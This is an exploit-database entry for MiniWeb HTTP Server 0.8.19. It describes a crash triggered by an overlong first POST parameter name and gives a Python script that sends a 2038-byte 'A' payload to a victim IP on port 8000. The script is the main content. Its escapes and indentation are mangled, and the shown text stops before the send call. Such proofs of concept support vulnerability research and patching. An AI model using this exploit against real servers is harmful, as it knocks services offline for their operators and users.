Authored by

MiniWeb HTTP Server version 0.8.19 buffer overflow proof of concept exploit.

# Exploit Title: MiniWeb HTTP Server 0.8.19 - Buffer Overflow (PoC)
# Date: 13.12.2020
# Exploit Author:
# Author Mail: hello[AT]
# Vendor Homepage:
# Software Link:
# Version: 0.8.19
# Tested on: Win7 x86
# Researchers: Security For Everyone Team -


MiniWeb HTTP server 0.8.19 allows remote attackers to cause a denial of service (daemon crash) via a long name for the
first parameter in a POST request.


The vulnerability is the first parameter's name of the POST request. Example: PARAM_NAME1=param_data1&param_name2=param_data2
if we send a lot of "A" characters to "PARAM_NAME1", the miniweb server will crash.

About Security For Everyone Team

We are a team that has been working on cyber security in the industry for a long time.
In 2020, we created where everyone can test their website security and get help to fix their vulnerabilities.
We have many free tools that you can use here:



import socket
import sys
import struct

if len(sys.argv) != 2 :
print "[+] Usage : python [VICTIM_IP]"

TCP_IP = sys.argv[1]
TCP_PORT = 8000

xx = "A"*2038 #4085

http_req = "POST /index.html HTTP/1.1rn"
http_req += "Host:"
http_req += "From: header-datarn"
http_req += "Content-Type: application/x-www-form-urlencodedrnrn"
http_req += xx + "=param_data1&param_name2=param_data2"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TCP_IP, TCP_PORT))
print "[+] Sending exploit payload..."